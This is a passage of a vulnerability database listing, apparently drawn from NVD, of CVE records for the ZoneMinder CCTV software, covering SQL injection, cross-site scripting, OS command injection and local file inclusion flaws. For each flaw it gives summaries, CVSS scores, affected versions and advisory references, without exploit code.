"name": "https://github.com/ZoneMinder/zoneminder/commit/bb07118118e23b5670c2c18be8be2cc6b8529397",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/bb07118118e23b5670c2c18be8be2cc6b8529397"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/de8f387207e9c506e8e8007eda725741a25601c5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/de8f387207e9c506e8e8007eda725741a25601c5"
}
],
"source": {
"advisory": "GHSA-9cmr-7437-v9fj",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder Time-based SQL Injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43360",
"datePublished": "2024-08-12T20:55:14.760Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-15T19:00:59.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43359 (GCVE-0-2024-43359)
Vulnerability from nvd – Published: 2024-08-12 20:49 – Updated: 2024-08-13 17:05
VLAI?
Title
XSS vulnerabilities in montagereview
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the montagereview via the displayinterval, speed, and scale parameters. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThan": "1.36.34",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "1.37.61",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43359",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-13T17:03:34.296728Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-13T17:05:24.009Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the montagereview via the displayinterval, speed, and scale parameters. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 0,
"baseSeverity": "NONE",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:49:28.130Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-pjjm-3qxp-6hj8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-pjjm-3qxp-6hj8"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/6cc64dddff6144a98680f65ecf8dc249028431af",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/6cc64dddff6144a98680f65ecf8dc249028431af"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/b51c5df0cb869ca48fccfc6e6fd7c19bf717ecd2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/b51c5df0cb869ca48fccfc6e6fd7c19bf717ecd2"
}
],
"source": {
"advisory": "GHSA-pjjm-3qxp-6hj8",
"discovery": "UNKNOWN"
},
"title": "XSS vulnerabilities in montagereview"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43359",
"datePublished": "2024-08-12T20:49:28.130Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-13T17:05:24.009Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43358 (GCVE-0-2024-43358)
Vulnerability from nvd – Published: 2024-08-12 20:46 – Updated: 2024-08-14 13:40
VLAI?
Title
XSS vulnerability in filter view
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the filter view via the filter[Id]. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
6.1 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43358",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-14T13:39:31.416791Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-14T13:40:05.699Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the filter view via the filter[Id]. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:46:59.082Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-6rrw-66rf-6g5f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-6rrw-66rf-6g5f"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/062cf568a33fb6a8604ec327b1de8bb2e0d1ff77",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/062cf568a33fb6a8604ec327b1de8bb2e0d1ff77"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/4602cd0470a3b90b18bcc44b3c86d963872d1ba0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/4602cd0470a3b90b18bcc44b3c86d963872d1ba0"
}
],
"source": {
"advisory": "GHSA-6rrw-66rf-6g5f",
"discovery": "UNKNOWN"
},
"title": "XSS vulnerability in filter view"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43358",
"datePublished": "2024-08-12T20:46:59.082Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-14T13:40:05.699Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-41884 (GCVE-0-2023-41884)
Vulnerability from nvd – Published: 2024-08-12 19:39 – Updated: 2024-08-13 17:34
VLAI?
Title
ZoneMinder Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in watch.php
Summary
ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34.
Severity ?
7.1 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThan": "1.36.34",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-41884",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-13T17:33:59.888497Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-13T17:34:56.389Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T19:39:34.575Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-2qp3-fwpv-mc96",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-2qp3-fwpv-mc96"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6"
}
],
"source": {
"advisory": "GHSA-2qp3-fwpv-mc96",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027) in watch.php"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-41884",
"datePublished": "2024-08-12T19:39:34.575Z",
"dateReserved": "2023-09-04T16:31:48.224Z",
"dateUpdated": "2024-08-13T17:34:56.389Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-25730 (GCVE-0-2020-25730)
Vulnerability from nvd – Published: 2024-04-04 00:00 – Updated: 2024-11-04 18:42
VLAI?
Summary
Cross Site Scripting (XSS) vulnerability in ZoneMinder before version 1.34.21, allows remote attackers execute arbitrary code, escalate privileges, and obtain sensitive information via PHP_SELF component in classic/views/download.php.
Severity ?
8.2 (High)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2020-25730",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:46:50.759677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T18:42:35.447Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T15:40:36.960Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/9268db14a79c4ccd444c2bf8d24e62b13207b413"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross Site Scripting (XSS) vulnerability in ZoneMinder before version 1.34.21, allows remote attackers execute arbitrary code, escalate privileges, and obtain sensitive information via PHP_SELF component in classic/views/download.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-04T07:15:03.188180",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/ZoneMinder/zoneminder/commit/9268db14a79c4ccd444c2bf8d24e62b13207b413"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-25730",
"datePublished": "2024-04-04T00:00:00",
"dateReserved": "2020-09-17T00:00:00",
"dateUpdated": "2024-11-04T18:42:35.447Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26039 (GCVE-0-2023-26039)
Vulnerability from nvd – Published: 2023-02-25 01:31 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder vulnerable to OS Command injection in daemonControl() API
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33.
Severity ?
7.1 (High)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.485Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26039",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T20:56:57.202881Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:12.912Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:31:36.622Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g"
}
],
"source": {
"advisory": "GHSA-44q8-h2pw-cc9g",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder vulnerable to OS Command injection in daemonControl() API"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26039",
"datePublished": "2023-02-25T01:31:36.622Z",
"dateReserved": "2023-02-17T22:44:03.149Z",
"dateUpdated": "2025-03-10T21:05:12.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26038 (GCVE-0-2023-26038)
Vulnerability from nvd – Published: 2023-02-25 01:27 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder contains Local File Inclusion vulnerability via `web/ajax/modal.php`
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via web/ajax/modal.php, where an arbitrary php file path can be passed in the request and loaded. This issue is patched in versions 1.36.33 and 1.37.33.
Severity ?
5.4 (Medium)
CWE
- CWE-426 - Untrusted Search Path
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.482Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26038",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T20:59:50.438578Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:18.989Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via web/ajax/modal.php, where an arbitrary php file path can be passed in the request and loaded. This issue is patched in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426: Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:27:39.450Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w"
}
],
"source": {
"advisory": "GHSA-wrx3-r8c4-r24w",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder contains Local File Inclusion vulnerability via `web/ajax/modal.php`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26038",
"datePublished": "2023-02-25T01:27:39.450Z",
"dateReserved": "2023-02-17T22:44:03.148Z",
"dateUpdated": "2025-03-10T21:05:18.989Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26037 (GCVE-0-2023-26037)
Vulnerability from nvd – Published: 2023-02-25 01:18 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder contains SQL Injection via report_event_audit
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an SQL Injection. The minTime and maxTime request parameters are not properly validated and could be used execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33.
Severity ?
8.9 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.577Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-65jp-2hj3-3733",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-65jp-2hj3-3733"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26037",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T20:57:34.755920Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:25.558Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an SQL Injection. The minTime and maxTime request parameters are not properly validated and could be used execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:18:41.988Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-65jp-2hj3-3733",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-65jp-2hj3-3733"
}
],
"source": {
"advisory": "GHSA-65jp-2hj3-3733",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder contains SQL Injection via report_event_audit"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26037",
"datePublished": "2023-02-25T01:18:41.988Z",
"dateReserved": "2023-02-17T22:44:03.148Z",
"dateUpdated": "2025-03-10T21:05:25.558Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26036 (GCVE-0-2023-26036)
Vulnerability from nvd – Published: 2023-02-25 01:13 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder contains Local File Inclusion vulnerability
Summary
